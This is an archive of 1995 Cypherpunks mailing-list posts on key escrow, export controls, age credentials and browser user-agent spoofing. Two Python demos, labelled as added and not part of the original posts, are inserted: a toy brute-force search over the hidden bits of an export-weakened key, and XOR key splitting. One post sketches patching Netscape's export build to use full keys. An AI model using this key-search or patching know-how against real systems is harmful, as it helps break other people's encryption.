even government-employed espionage personnel, or maybe long-term
espionage is just inherently difficult; the Soviet Empire,
Nazi Germany, and WWII Britain had all identified most of the spy
rings operating against them.  Philip Agee's article on how to
identify the CIA agents in a US embassy may have surprised the CIA,
but wouldn't have given any significant new information to the KGB.
(They might have been surprised he'd _say_ it...)
And amateurs and newcomers to the business aren't always that good.

Also, maybe a spy would be using GAKed crypto to avoid attracting
attention.  Much of espionage, especially emerging economic espionage,
primarily uses open-source information; there's nothing too secret
about sending the latest SAIC want-ads from EE Times back home,
but the CIA may learn what targets you're watching by watching
enough of your traffic to guess at your filtering criteria.

And sometimes you're just stuck on the Beltway and have to use your
car phone to say you'll be a bit late dropping off the secret plans.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:37 PST
To: cypherpunks@toad.com
Subject: Re: Secret Clearance (was: re: NIST GAK export meeting, sv)
Message-ID: <199512062336.PAA14064@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:00 PM 12/5/95 -0500, Pete Loshin <pete@loshin.com> wrote:
>The point is, if you want to keep your organization's systems secure,
>you need some mechanism to do so. Security clearance is one way;
>banks and other financial institutions do other things (like fingerprints,
>background checks, etc.)
...
>My big question is, do any of the companies providing Internet services,
>or Internet software, or digital commerce services/software, employ
>any of these security mechanisms on their employees? 

Few, if any, other than companies already in the military business;
secret clearances are _expensive_, usually take a long time to get,
and the military only gives them to people who need them.  Normally,
to get clearances for your employees, you need to have a security
bureaucracy to also get clearance for handling classified material
in your building, though perhaps they'd make other arrangements
so the cleared escrow agent could take the master keys down to
the local FBI office to unlock somebody's correspondence.

Commercial companies are more likely to use bonding services to
insure themselves against employee theft, though they also
do things like talking to previous employers, and for sensitive
positions some companies check criminal records.  Many companies
will run a TRW-or-equivalent credit check on applicants to
see if there are major outstanding problems (though somehow the
Mafia seldom reports bad gambling debts to TRW :-), and some
companies pretend they're doing drug tests to check for
people with expensive habits.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 12:38:15 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: PGP
In-Reply-To: <Pine.LNX.3.91.951206130026.23641B-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.SOL.3.91.951206152752.14984D-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


> you really ought to be more thoughtful about what and how you write on 
> the cypherpunks list...


    The how is referring to not double spacing isn't it.  Sorry,

I've been up for the last couple of days and didn't even realize it.

What do you mean what I write about?   


> 
> anyway,  the PGP code from MIT should compile on nearly all unix 
> machines.  i'm not sure it will compile with a g++ compiler though.  all 
> unix type machines should have uncompress, tar, (g)cc.  just get the 
> source from MIT.


      I am not an idiot.  I must have downloaded PGP from about 20 million

different places.  They are all either missing files, sometimes the

darn code won't compile, or when I "tar xvf" half of the files bring

up an error and the computer says it can not create the file.  I'll try

the address that you've sent.  Hopefully I will have better luck. 

      In the pursuit of constructing a stable cryptographic program

that uses PGP what features should be included.  Obviously all of

the ones that PGP has and encrypting/decrypting e-mail but what else?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 14:24:36 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <aceb57071f0210045a46@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is a VERY positive idea!

At 3:54 PM 12/6/95, Peter Trei wrote:

>Actually, I've been thinking about this quite a bit recently. I'm building
>an SSL enabled server, and client-side authentication may provide
>some help. I could see a user getting his or her public key certificate
>signed with different CA keys which assert any number of conditions,
>such as:
>
>Key holder was born before (some particular date).
>Key holder has access to sales data for XYZ corp.
>Key holder is an adult who takes the first amendment seriously.
>
>... and the server would recognize different CA signatures as permitting
>different levels of access.

This is something that could get two things done:

1. Protect ISPs and Web sites from claims they aren't taking any steps to
block children. (I won't get into the "children should be allowed to
appreciate the beauty of the human body" issue, just noting that an ISP or
Web site could deny access to account holders under 18, or over 30, or
whatever he wants to do.)

2. Get wider currency for the concept of digitally signed credentials,
especially if these are _blinded credentials_, where the credential is for
an age, say, and not an identity. (Standard Chaumian stuff, though likely
to be nontrivial to implement.)

>If your browser permitted you to select the key certificate  used in
>setting up the encrypted link (and different certs or sets of certs
>could be protected with different passphrases), then Mom or Dad
>could use their I-am-an-adult credential to read www.xxx.com,
>while Junior could not. There *is* a loss of anonymity in this scheme,
>however.

There may be ways around the loss of anonymity. Ideally, with blinded
credentials, but in the short term, through Web proxies and/or servers.

For example, Sameer's c2.org could issue accounts to people who can prove
they are over 18 (notarized copies of birth certif., passport, etc.).
Sameer's system would then have a credential saying "this account name is
over 18."

(There is of course little that can be done about people who lend their
accounts to minors, absent any effective biometric security measures. No
current system, certainly not Exon-Coates, can deal with this.)

>I realize that digital credentials are old hat on this list. The point I am
>making is that the pieces for doing this are here - we just need to
>assemble them.
>
>(This is not to suggest that I am in favor of Exon/Coates in any way -
>I am not. )

I think this could be quite a good project, provided it is not trying to be
all things to all people.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 6 Dec 95 12:46:51 PST
To: Richard Charles Graves <llurch@networking.stanford.edu>
Subject: Re: Note on "Barring Netscape"
In-Reply-To: <199512061957.LAA05418@Networking.Stanford.EDU>
Message-ID: <9512061547.ZM8340@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Dec 6, 11:57am, Richard Charles Graves wrote:
> The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 (compatible"
> to the server, which triggers an incorrect response from, e.g., www.c2.org.
> This little fraud has the potential to make you look silly if left unexplained.

this *is* fraud, in a way. Microsoft is shipping a product which in a
certain exchange claims to be a product of another company. Microsoft's
software is being treated better around the net because it is recognised
as Netscape, which it isn't.

It would be somewhat like me walking through the short line at Heathrow
as a EU citizen even though I'm actually a Canadian citizen.

If Microsoft had used "MSIE 1.0 (...)", then they would have to gain
"market share" in convincing the web that their browser is worth writing
content for. As a side note, there are suggestions that httpds should be
a little more intelligent about HTML, recognising which clients can handle
which versions of html [so that they would ship 1.0 to those which can
handle 1.0, 2.0 to those which think they can handle 2.0, and perhaps we
have a 2.0-netscape-ENHANCED-ha-ha-ha]. If this were to be encouraged by
both httpd creators and client creators, with both sides being honest,
then uSoft would not need to claim to be shipping Netscape. They could
just say html-2.0-microsoft-ENHANCED-ow-my-sides [e.g.] and servers could
check the 2.0 and pay attention to the rest if they wished. [On a side
note, if all governments decided to close up shop tomorrow, many people
on this list would be happy. Which is more likely?]

http, from my meagre understanding, is supposed to be a negotiation (among
other things) with both sides agreeing on what the client can handle and
what the server can offer. Perhaps Microsoft could be encouraged to be
honest about what they are shipping. (I don't doubt that other clients
may also lie about who they are.)

richard

ps - Life might be a lot easier for everyone on the web if Netscape forced
     uSoft software to be honest about what it is.

ObBarelyCrypto: Do our *browsers* now have to start authenticating themselves?

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYBVB1gtCYLvIJ1AQEi3gP+IqWbKqk6MTKviGMRw5ZKde+9BQ/iQOIA
jrrDXEZQIdwHBeeATOzqYFVzVxi5bQFgLPCt/kNTsyARwQbLGQ54HuR57qPX4EOm
d0d2A7oL4qsFwGvmETP4HlBQy10e5vKqM/7pLZl0s9cE/a3kWeZq+XCS4oBKHDtF
alTjxYClsAg=
=hOc9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Wed, 6 Dec 95 12:46:54 PST
To: "cypherpunks@toad.com>
Subject: Inherent Insecurity of Internet Commerce! (was RE: Secret Clearance)
Message-ID: <01BAC3F2.3D4F0240@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'll try again. First, as I recall, SECRET clearance 
is actually not very high: when I got it, I had to answer 
a bunch of questions (do you abuse illegal drugs? are 
you now or have you ever been a member of any 
organizations? have you ever been _arrested_ for anything?) 
and fill out some forms and get fingerprinted. They 
probably did a credit check, and that was about it. 
Nobody I knew got any calls asking about my habits 
(that is reserved for higher clearances).

So now I'll rename the thread again: "Inherent Insecurity 
of Internet Commerce" -- <sarcasm>maybe now the NYT 
will feature me on the front page for "discovering" this
inherent flaw in the Internet.</sarcasm>

My purpose in renaming the thread in the first place 
was to start another thread relating to the types of 
security in places like, say, Netscape or Spyglass 
or CyberCash or First Virtual or Interramp or any 
other ISP or software company. Because I want to 
know how susceptible these companies are to hiring 
the wrong people.

So, here's the "bug": if some agency of crime/espionage 
wants to subvert any of these systems, all they need 
do is employ the same blackmail/bribe techniques 
used to recruit actual spies on some employees of 
these companies. They then slip in some hacked 
versions of the software with the good ones, or modify 
distribution servers, or slip code into servers that 
forwards every tenth credit card number somewhere.

Or how about getting a janitor to plug a wireless tap 
into one of the major Internet backbones to sniff for 
cc#s as well as interesting e-mail?

Also, since there's enough noise here already (and 
even I don't see that much crypto-relevance) I won't 
post again on this topic, but I am very interested in 
hearing concrete examples of how Internet companies 
are protecting themselves, and also in hearing about 
specific instances of security failing (e.g., has anyone 
ever found a tap on a backbone?)

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 6 Dec 95 12:40:55 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <9512062040.AA20810@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> (Controlling Web page accesses is a much tougher problem, of course. so I
> wouldn't expect much action on this at first.)
> 
> By the way, I recently discovered a new twist on "age credentials": the use
> of credit cards to prove age. One image site is asking for a "valid credit
> card number" to be given...not to use for charges, but just to do a quick
> verification (they claim a few minutes or less) that the card is valid and
> in the name of the person accessing their site.
> Timothy C. May              | Crypto Anarchy: encryption, digital money,

Actually, I've been thinking about this quite a bit recently. I'm building
an SSL enabled server, and client-side authentication may provide
some help. I could see a user getting his or her public key certificate
signed with different CA keys which assert any number of conditions,
such as:

Key holder was born before (some particular date).
Key holder has access to sales data for XYZ corp.
Key holder is an adult who takes the first amendment seriously.

... and the server would recognize different CA signatures as permitting
different levels of access.

If your browser permitted you to select the key certificate  used in 
setting up the encrypted link (and different certs or sets of certs
could be protected with different passphrases), then Mom or Dad
could use their I-am-an-adult credential to read www.xxx.com,
while Junior could not. There *is* a loss of anonymity in this scheme,
however.

I realize that digital credentials are old hat on this list. The point I am
making is that the pieces for doing this are here - we just need to
assemble them.

(This is not to suggest that I am in favor of Exon/Coates in any way -
I am not. )

Speaking for myself alone....





   

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Wed, 6 Dec 95 12:49:17 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <199512062048.PAA15070@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@got.net (Timothy C. May) wrote:
>
>I just heard (12:15 EST) that the House has adopted language similar to the
>original Exon-Coates language in the Senate

I consider it unlikely in the extreme that this passed without Gingrich's
sanction.  So I guess the Newt's much-publicized opposition to the Exon
amendment was just a show.

- ---------------------------------------------------------------------------
Kevin S. Van Horn | Uncle Sam needs YOU!
vanhorn@atext.com | But not vice versa.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMYBmCoZzwIn1bdtAQE9lwGA1w4SUuzkxqcrIWu2EJq65rspqg7PVL6Y
FcMbibELAnFrZOUKNVtQNXxtpfaItIGR
=QI3W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 6 Dec 95 13:18:46 PST
To: jimbell@pacifier.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <9512062117.AA00306@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You would not be allowed to export a browser where the crypto library is
a dynamically-loaded library.

If you wrote a "browser toolkit", you would have to take special care to
hide even the names of the crypto functions in the library symbol table.

If you want to do offshore crypto development, your best bet is to document
the required interfaces and protocols in a publication which is available to
anyone, as this is supposedly protected by the First Amendment.

On the other hand, I encourage you to try to do otherwise.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 6 Dec 95 13:22:47 PST
To: cypherpunks@toad.com
Subject: Kim Philby in Washington
Message-ID: <199512062123.QAA25167@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


         Burgess, Philby, and Maclean in Washington 
                  A Comment on Clipper and G.A.K. 
 
It is historically indisputable that Guy Burgess, Harold "Kim" 
Philby, and Donald Maclean were agents for Soviet intelligence. 
 
What is far less known is the role that these three individuals 
played in the U.S.A. and how this related to their access to U.S. 
secret material. 
 
Maclean, at one time, was the Head of Chancery of the British 
Embassy in Washington D.C. As such, he was the head of the code 
room at the Embassy and thus had access to *all* encrypted traffic 
passing through the Embassy. This included everything available 
through the considerable Anglo-U.S. co-operative ventures during 
the immediately-post W.W. II period. 
 
Guy Burgess was also assigned to the British Embassy where one job 
was as a liaison agent with the U.S.A. It has been reported during 
this period that he had a pass from the Atomic Energy Commission 
that gave him 24-hour-a-day access unaccompanied by any U.S. 
"overseer." This was a higher level of A.E.C. security than held 
by J. Edgar Hoover at the time. 
 
Kim Philby was the U.K.'s liaison to the Central Intelligence 
Agency. He was personally close ("a drinking buddy") to then head 
of C.I.A. Counter-Intelligence James Jesus Angleton. 
 
Angleton was, to all accounts, a psychopathologically paranoid 
individual, seeing Soviet spies and disinformation attempts in 
almost all areas of life with the exception of his one-time bar 
companion. He might be likened to one of those hysterical 
Victorian "feminists" who thought "all men are pigs" with the 
exception of one real gentleman she knew. (The gentleman would, of 
course, be Jack the Ripper.) 
 
I write this not out of any sense that Key Escrow or Clipper are 
"communist plots." Far from it, especially during this period. 
 
But the presence of Burgess, Philby, and Maclean in Washington 
shows how unable the governments have been to protect their own 
secrets. It is unreasonable to suggest -- as do supporters of 
Clipper and G.A.K. -- that governments will be any better 
protecting ours. 
 
--tallpaul 
      
      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 6 Dec 95 14:28:05 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <aceb2a8d1b021004e6f8@[205.199.118.202]>
Message-ID: <199512062229.RAA16714@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>Yes, I read your proposal. The "hooks" term is not my coinage, but refers
>to this general idea. I urge you to read what others, including companies,
>have had to say on this matter. Much of the debate on "interoperability"
>revolves around details of entry points to crypto modules and such hooks.
>
>No point in arguing with Jim on this anymore, so I won't.

I agree.  It does bring to mind an idea, though.  Netscape builds an
exportable system by choosing a random 128 bit number and then just
including 88 bits of it in plaintext.

This means one of two things.  Either there's a field which holds the
"key", but the export version stores 88 bits plain + 40 bits cipher,
and knows this structure, or there's a field which holds the 128 bit
enciphered key, and a second field which holds the 88 bits of plaintext
key.

In the latter case, a patch which modifies the code which stores the
88 bit plaintext field to write all zeros would be almost trivial.
Just over-write the store instructions with noops, most likely.

In the former, the patch would be more significant, but still possible.
You'd disable the "write the plain" part and extend the "decode the
cipher" part to decode all 128 bits --- probably just a loop test.

Either patch for a given system should require less than a page of
explanation.

I wonder how the ITAR would view this.
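
The key layout described in the message above, as an added example that is not part of the original post and not Netscape's code: it models a 128-bit master key with 88 bits disclosed and measures how much work is left for someone who sees the disclosed part. Which end of the key is disclosed, the HMAC-SHA256 check value standing in for "a known plaintext encrypted under the key", and all function names are assumptions made for the illustration.

```python
import hashlib
import hmac

KEY_BITS = 128     # size of the random master key, from the post
CLEAR_BITS = 88    # bits the export version includes in plaintext, from the post


def split_master(master, clear_bits=CLEAR_BITS):
    """Return (clear_part, secret_part). Assumption: the high bits are disclosed."""
    secret_bits = KEY_BITS - clear_bits
    clear = master >> secret_bits
    secret = master & ((1 << secret_bits) - 1)
    return clear, secret


def join_master(clear, secret, clear_bits=CLEAR_BITS):
    """Rebuild the full 128-bit key from its disclosed and secret parts."""
    return (clear << (KEY_BITS - clear_bits)) | secret


def check_value(master):
    """Stand-in for ciphertext of a known plaintext (hypothetical, not SSL)."""
    key = master.to_bytes(KEY_BITS // 8, "big")
    return hmac.new(key, b"constructed known plaintext", hashlib.sha256).digest()


def worst_case_trials(clear_bits=CLEAR_BITS):
    """Guesses needed in the worst case: only the undisclosed bits count."""
    return 1 << (KEY_BITS - clear_bits)


def search_secret_part(clear, target, clear_bits):
    """Exhaust the undisclosed bits; return (master_key, trials_used)."""
    secret_bits = KEY_BITS - clear_bits
    for trials, guess in enumerate(range(1 << secret_bits), start=1):
        candidate = join_master(clear, guess, clear_bits)
        if hmac.compare_digest(check_value(candidate), target):
            return candidate, trials
    return None, 1 << secret_bits


if __name__ == "__main__":
    # Constructed sample key, not a real session key.
    master = 0x0123456789ABCDEF0123456789ABCDEF

    clear, secret = split_master(master)
    print("disclosed bits :", CLEAR_BITS)
    print("secret bits    :", KEY_BITS - CLEAR_BITS)
    print("worst case     : 2^%d trials" % (KEY_BITS - CLEAR_BITS))

    # Scaled-down run so it finishes instantly: disclose 116 bits, hide 12.
    demo_clear_bits = 116
    clear, secret = split_master(master, demo_clear_bits)
    found, trials = search_secret_part(clear, check_value(master), demo_clear_bits)
    print("recovered      :", found == master, "after", trials, "trials")
    print("search space   :", worst_case_trials(demo_clear_bits))
```

The nominal key size never enters the cost of the search; the work is set entirely by the number of bits that stay undisclosed.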




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 6 Dec 95 14:35:02 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNR0t-00093sC@pacifier.com>
Message-ID: <9512062236.AA01307@alpha>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes, carefully avoiding the "Return" key:
 > 1.  Write a program limited to keysize ...
 > 2.  Get it export approved.  Export it.

If you do step 1, then step 2 is impossible.  If your application is
constructed such that a non-export-approvable cryptosystem can be
dropped on top, then you will not get export approval.  (I know this
from our direct experience here.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rogaski@phobos.lib.iup.edu (Mark Rogaski)
Date: Wed, 6 Dec 95 13:41:41 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: SKIP
Message-ID: <9512062140.AA14601@phobos.lib.iup.edu.>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can anyone remember the URL for SKIP for Solaris, that little piece
of paper has become a victim of the clutter ...

- -----
Mark Rogaski           100,000 lemmings     rogaski@phobos.lib.iup.edu 
aka Doc, wendigo        can't be wrong!     http://www.lib.iup.edu/~rogaski/

VMS is as secure as a poodle encased in a block of lucite 
						... about as useful, too.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYNYx0c4/pqJauBAQHPFwQAoG6wtJJsq9QJB2MU02G08Vo436jK0sZs
XscSvlpKUtYbyJORj4ETVdfDAAoyQdjZFQQTeH4vt413DPbmqgwKs+QnBrI49evv
UjhmcGvxFMj8DpkxiL+5ANu6nrzLWM9smUDWlpKTa3HN59Kq5shlHIlp+yo6AH08
AIInsCZh+YU=
=jUrp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 6 Dec 95 15:29:40 PST
To: cypherpunks@toad.com
Subject: Re: Note on "Barring Netscape"
In-Reply-To: <9512061547.ZM8340@glacius.alias.com>
Message-ID: <yJJPFD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Richard Martin" <rmartin@aw.sgi.com> writes:
> On Dec 6, 11:57am, Richard Charles Graves wrote:
> > The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 (compatible"
> > to the server, which triggers an incorrect response from, e.g., www.c2.org.
> > This little fraud has the potential to make you look silly if left unexplained.
>
> this *is* fraud, in a way. Microsoft is shipping a product which in a
> certain exchange claims to be a product of another company. Microsoft's
> software is being treated better around the net because it is recognised
> as Netscape, which it isn't.

This reminds me of how many many years ago, when IBM and Microsoft were
good friends, earlier versions of MS Windows(?) video drivers were
hard-coded not to recognize a video card as being VGA-compatible (or
even EGA-?) unless its ROM had the 3 letters "IBM" at offset 0x1e. The
genuine vanilla IBM card had the words "COPYRIGHT IBM" at that address.
Various clone makers had to put "IBM" at that location to make their
cards work with Windows(?). E.g., I have a Trident VGA card whose ROM
says "RESERVED FOR IBM COMPATIBILITY" positioned so that "IBM" is
exactly at 0x1E. Some other cards just say "IBM" there with no
explanation in adjacent memory.

I think that if some servers refuse to talk to clients unless they see
"Mozilla", then I can't blame Microsoft for impersonating Netscape.

I think the whole protocol is way stupid. Instead of asking the client
for its name, and then looking up in some database what a client with
that name is capable of, a server should ask the client only about the
capabilities that the server is planning to use.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 6 Dec 95 13:44:16 PST
To: cypherpunks@toad.com
Subject: Re: GAK
In-Reply-To: <6615943A01502C79@-SMF->
Message-ID: <Pine.LNX.3.91.951206163331.201A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 6 Dec 1995, Scott Binkley wrote:

> I heard a while back about being able to "split" up a PGP key.  What about
> splitting up the key into many parts, and giving them out to multiple
> INDEPENDENT agencies.  ie: One piece goes to the FBI, one to the NSA, one
> to some other committee, and so on.  That way, no government body could
> just tap your conversations without getting approval from others, and
> gaining the pieces of your key.
> 
> just a thought
> 
> 

This is exactly how the clipper works.  The unit key is XORed with 160
random bits, the result is given to one government agency, and the random
bits are given to another agency.
 
The largest concern I have about wiretapping is not so much that some corrupt
law enforcement agents will wiretap me out of malice, but that if I communicate
with someone who is being wiretapped, my end of the conversation will be heard
as well.  I might be giving out sensitive information to some government
agent without ever violating any laws and without any reason for the government
to believe that I was a criminal.  For this reason, I believe that cryptography
should not be regulated.  I would never trust the government with any of my
decryption keys.

finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key info: 0xF9B22BA5 bd24d08e3cbb53472054fa56002258d5
- -----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
- ------END GEEK CODE BLOCK------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYO4rZc+sv5siulAQHsDAP/dWDLQouo5dx7kZp4wTOFJGB1v3T6Pi8v
FuAr7+k1ZfYDeD4J8+Hehrrm8JrPv0MBT9Bg8y560PSt9+9E8rShngH3p2ldYv8q
7XDX81bwJY5wrqweE97duQKmH3l0jTXb/7UMi+R7ESOCmLBhywhDCOO0SRlc3NIQ
xK5ty/F90YI=
=aQX+
-----END PGP SIGNATURE-----
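
The XOR split described in the message above, as an added example that is not part of the original post and not the Clipper implementation: it generalizes the two-agency case to any number of holders and shows that a holder who lacks even one share learns nothing about the key. The 20-byte width follows the 160 bits quoted in the message; the fingerprint check on recovery and all function names are assumptions added for the illustration.

```python
import hashlib
import secrets
from functools import reduce

KEY_BYTES = 20  # 160 bits, the width quoted in the message above


def xor_bytes(a, b):
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("shares must all have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def split_key(key, holders=2):
    """Split key so that every one of `holders` shares is needed to rebuild it."""
    if holders < 2:
        raise ValueError("need at least two holders")
    # holders-1 shares are pure randomness; the last is the key masked by all of them.
    pads = [secrets.token_bytes(len(key)) for _ in range(holders - 1)]
    masked = reduce(xor_bytes, pads, key)
    return [masked] + pads


def combine(shares):
    """XOR all shares together; correct only if every share is present."""
    if len(shares) < 2:
        raise ValueError("need at least two shares")
    return reduce(xor_bytes, shares)


def share_explaining(known_share, claimed_key):
    """The other share that would make known_share decode to claimed_key.

    Such a share exists for every possible key, which is why one share
    alone carries no information about the real key.
    """
    return xor_bytes(known_share, claimed_key)


def fingerprint(key):
    """Short check value recorded at escrow time (an addition, not in the post)."""
    return hashlib.sha256(key).hexdigest()[:16]


def recover(shares, expected_fingerprint):
    """Combine shares and refuse a result that is not the escrowed key.

    Plain XOR gives no error when a share is missing or altered; it just
    yields a different, wrong key. The fingerprint turns that into a failure.
    """
    key = combine(shares)
    if fingerprint(key) != expected_fingerprint:
        raise ValueError("shares do not reconstruct the escrowed key")
    return key


if __name__ == "__main__":
    unit_key = secrets.token_bytes(KEY_BYTES)   # constructed sample key
    fp = fingerprint(unit_key)

    agency_a, agency_b = split_key(unit_key)
    print("both shares    :", recover([agency_a, agency_b], fp) == unit_key)

    # Agency A alone: its share is consistent with any key whatsoever.
    decoy = b"\xff" * KEY_BYTES
    print("decoy explained:", combine([agency_a, share_explaining(agency_a, decoy)]) == decoy)

    # Three holders, one share withheld: recovery is rejected.
    three = split_key(unit_key, holders=3)
    try:
        recover(three[:2], fp)
    except ValueError as err:
        print("two of three   :", err)
```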




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Wed, 6 Dec 95 14:42:44 PST
To: Jason Burrell <cypherpunks@toad.com
Subject: Responding to Exon -- technology is not enough
Message-ID: <v01530501acebcc1c5522@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Jason Burrell <jburrell@crl.com> writes:

>*Sigh*. Are we really ready to go back to UUCP? It looks like we'll have
>to. That is, if someone doesn't set up a couple cryptographically enhanced
>subnets first, or come up with some better idea. Interesting prospect,
>actually.

Fine for the tiny subset of Net users who understand crypto enough to use
it on a daily basis. I'm not one of those people either. This crypto isn't user
friendly stuff. Before you propose such a solution, better make sure
people can use this stuff.

>Anyone wish to comment on the prospect of a double blind server, set
>outside U.S. borders, that can act as an interface to the rest of the
>world, perhaps encrypting or stego'ing the data transferred between it and
>the user? Basically, an anonymous remailer that acts as a cross between
>an NNTP, POP3, and SMTP servers.

How are you going to pitch this technology to all the people with AOL and
Microsoft Network accounts who barely understand the net? These are the
people who need exposure to all the uncensored expression they can get.

Instead of figuring out how to build a new treehouse that excludes Exon and
Hyde, how about fighting the damned bill in the courts?

bill.humphries@msn.fullfeed.com | WisCon 20: Two Decades of Feminism & SF
http://www.cs.wisc.edu/wiscon/  | Ursula K. Le Guin: Guest of Honor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Wed, 6 Dec 95 19:19:18 PST
To: ACLUNATL@aol.com
Subject: ACLU Cyber-Liberties Update: 12/6/95
Message-ID: <951206165626_46587199@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
December 6, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
